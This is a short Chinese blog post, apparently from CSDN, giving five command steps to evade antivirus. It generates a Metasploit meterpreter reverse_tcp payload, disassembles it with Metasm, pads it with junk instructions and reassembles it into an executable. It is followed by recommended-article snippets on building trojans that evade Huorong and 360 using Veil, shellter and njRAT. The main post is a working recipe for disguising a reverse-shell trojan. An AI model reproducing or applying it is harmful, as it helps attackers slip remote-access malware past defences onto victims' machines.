使用Metasm来绕过杀毒软件

最新推荐文章于 2023-02-14 10:39:28 发布
最新推荐文章于 2023-02-14 10:39:28 发布
阅读量441 收藏
点赞数
分类专栏: 渗透测试 kali 文章标签: ruby
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_16188/article/details/82605746
版权
技术本质还是花指令,本文的目的是使用metasploit框架来生成raw payload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件
1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary
2.拷贝metasm.rb文件和metasm文件夹到ruby的安装目录
cp /usr/share/metasploit-framework/lib/metasm.rb /usr/local/lib/site_ruby/1.9.1/
cp -r /usr/share/metasploit-framework/lib/metasm /usr/local/lib/site_ruby/1.9.1/
3. ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb raw_binary > test.asm
4.编辑花指令。[color=blue]关键一点,栈平衡[/color]
5. ruby /usr/local/lib/site_ruby/1.9.1/metasm/samples/peencode.rb test.asm -o coolstuff.exe
iteye_16188
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
绕过杀毒软件易语言源码
09-08
绕过杀毒软件 软件顺利运行软件
如何优雅的绕过杀软获取系统权限
hl1293348082的专栏
03-31 586
本文内容带有一定的攻击性,仅供学习交流使用,严禁用于非法用途 杀毒软件判断病毒木马的方式如下: 特征库扫描法:检查文件中是否存在与常见病毒相同的代码。如果匹配,则说明存在病毒。由于该方法较慢,因此现在一般使用通配符扫描法进行代替。 云扫描法:将可疑文件上传到云服务器进行检查。需要网络连接。 虚拟机脱壳法:使用虚拟机引擎进行文件脱壳(仅支持部分壳类型)。脱壳后的文件将会进一步接受上两种扫描方式的检查。 虽然 github 上有许多大牛写的脚本可以生成免杀的 payload,但往往都好景不长,所以今天
Metasm练手 一
......
08-04 281
一、Metasm 是什么? Metasm是用纯Ruby写的一个支持多CPU架构的汇编器,反汇编器,编译器,连接器及调试器。 著名的安全漏洞检测工具Metasploit Framework也使用Metasm。2011年4月份,Metasm的作者把Metasm放在了RubyGems.org上。   二、Metasm安装 Metasm是个gem,所以安装起来很简单: gem instal...
kali制作绕过火绒检测的木马(仅通过MSF的方式)
qq_50854662的博客
02-14 3258
kali制作绕过火绒检测的木马(仅通过MSF的方式)
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
weixin_44647915的博客
04-18 1万+
目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低。 工具准备:火绒安全-3.0.42.0 下载文章:火绒历史全版本 百度网盘链接:https://pan.baidu.com/s/1ZrpYG63aDtQDVBnDFZoeXw 提取码:kr72 实验环境:kali-2019.4 (攻击方,IP:192.168.152.134)、win10(靶机) 【知识补充】 关于Msfvenom: (msfvenom ----a Metasploi
metasm-scripts:Metasm 脚本
07-04
总的来说,MetasmRuby 开发者的一个强大工具,它提供了一个接口,使他们能够在高级语言中编写底层代码,同时保持灵活性和效率。如果你需要处理与操作系统交互、生成或解析二进制文件,或者进行逆向工程的工作,...
免杀学习.zip
最新发布
10-06
7. **虚拟机绕过**:许多反病毒软件使用虚拟机来执行可疑代码以检测其行为。恶意软件可以通过识别虚拟环境并改变行为以逃避检测。 8. **系统调用隐藏**:通过修改系统调用表或者使用自定义的系统调用实现,使反病毒...
obfy:通过 ASM 混淆对 Metasploit 有效负载自动进行 AV 规避
07-11
该工具使用 metasm ruby​​ gem,必须安装该 gem 才能工作。 我只在 Back Track 和 Kali linux 上测试过这个脚本。 所有未来的测试都只会在 Kali 上进行。 自定义负载选项似乎适用于任何 metasploit 负载,但它并不...
绕过杀软(二)——免杀exe文件(360、火绒免杀)
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
SM16188B to Controller.pdf
04-14
SM16188B 系统控制说明文档
电子显示屏设置(LED Player3.3绿色版)
08-13
电子显示屏设置(LED Player3.3绿色版)
Kali——绕过杀毒软件检测工具Veil-Evasion
董哥的黑板报
06-25 3296
一、Veil-Evasion工具介绍 逃过杀毒软件检测的方式有很多,其中很优秀的方法需要一定的编译和汇编的知识。此处只是介绍一种简单而且可以躲过杀毒软件查杀的工具Veil-Evasion 绕过杀毒软件检测的原理:许多的杀毒软件都采用了模式匹配或者特征匹配的工作模式,如果一个程序中不存在病毒库的特征码,那么该杀毒软件就不会认为这是一个病毒文件。因此我们需要修改或者掩盖恶意软件的特征码,这样杀毒软...
linux卸载veil,Kali Linux中的VEIL Framework绕过防病毒软件实验
weixin_34957608的博客
05-08 320
原标题:Kali Linux中的VEIL Framework绕过防病毒软件实验 在进行渗透测试的过程中,绕过反病毒产品一直是一个“令人头疼”的事情。今天,我们将跟大家如何绕过目前市面上大部分的免费反病毒产品。由于很多新手用户喜欢使用AVAST或AVG这样的轻量级的不占用太多系统资源的反病毒产品,因此我们的实验环境使用免费的AVAST反病毒软件,运行系统为Windows 10。测试工具1、 Kali...
Metasploit 魔鬼训练营》01 初识 Metasploit
kevinhanser
08-23 1604
1 . 使用 msf 图形化工具 armitage从 armitage 2 . 使用 msfconsole 控制台利用 samba 漏洞获取控制权 3 . 使用 msfconsole 控制台利用 VNC 漏洞获取控制权 4 . 总结过程
绕过杀毒软件之一(实时监控篇)
老裴
06-21 6541
杀毒软件的实时监控分为两个部分  一:Notify部分  二:Attach到文件系统部分一:Notify对与杀毒软件致关重要(有些流氓软件也用的),主要用到的是   PsSetLoadImageNotifyRoutine和   PsSetCreateProcessNotifyRoutine这两个函数1 PsSetLoadImageNotifyRoutine(  IN PLOAD_IMAGE_NOT
【翻译】各种Payload免杀工具集
收集盒 Book box
08-11 2134
原文链接 http://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html 感觉直译成AV规避框架挺蛋疼. //————————————————————————————- 主要是针对Msf生产的payload进行免杀.不一定要求做到全免杀,至少能够对某一特定的AV进行免杀.
【免杀测试】Kali之Metasploit几款工具免杀练习
朔方飞絮谈安全
01-11 1万+
余磊  不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。 下面就尝试测试有关工具的免杀效果,三款工具为,shellter,Veil,  Avet 01 shellter Shellter采用了动
kali免杀工具shellter
scholar_1的博客
08-06 4036
工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。Choose Operation Mode - Auto/Manual (A/M/H):A //A:自动模式自动注入后门,M:高级模式,H:帮助。(Y/N/H): Y //是否启用隐身模式 Y:启用 N:不启用 H:帮助。...
MFC/VC下控制windows服务——停止服务,启动服务
C语言是最好的编程语言
11-02 5651
MFC/VC下控制windows服务——停止服务,启动服务 操作系统: Windows7 64位(经测试,Windows10不能用) 运行环境: Visual Studio 10 文件编码: Unicode 需要添加的头文件: #include void CXXXDlg::ServiceRun() { SERVICE_STATUS ssStatus; //获得ServiceControl Manager的句柄
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值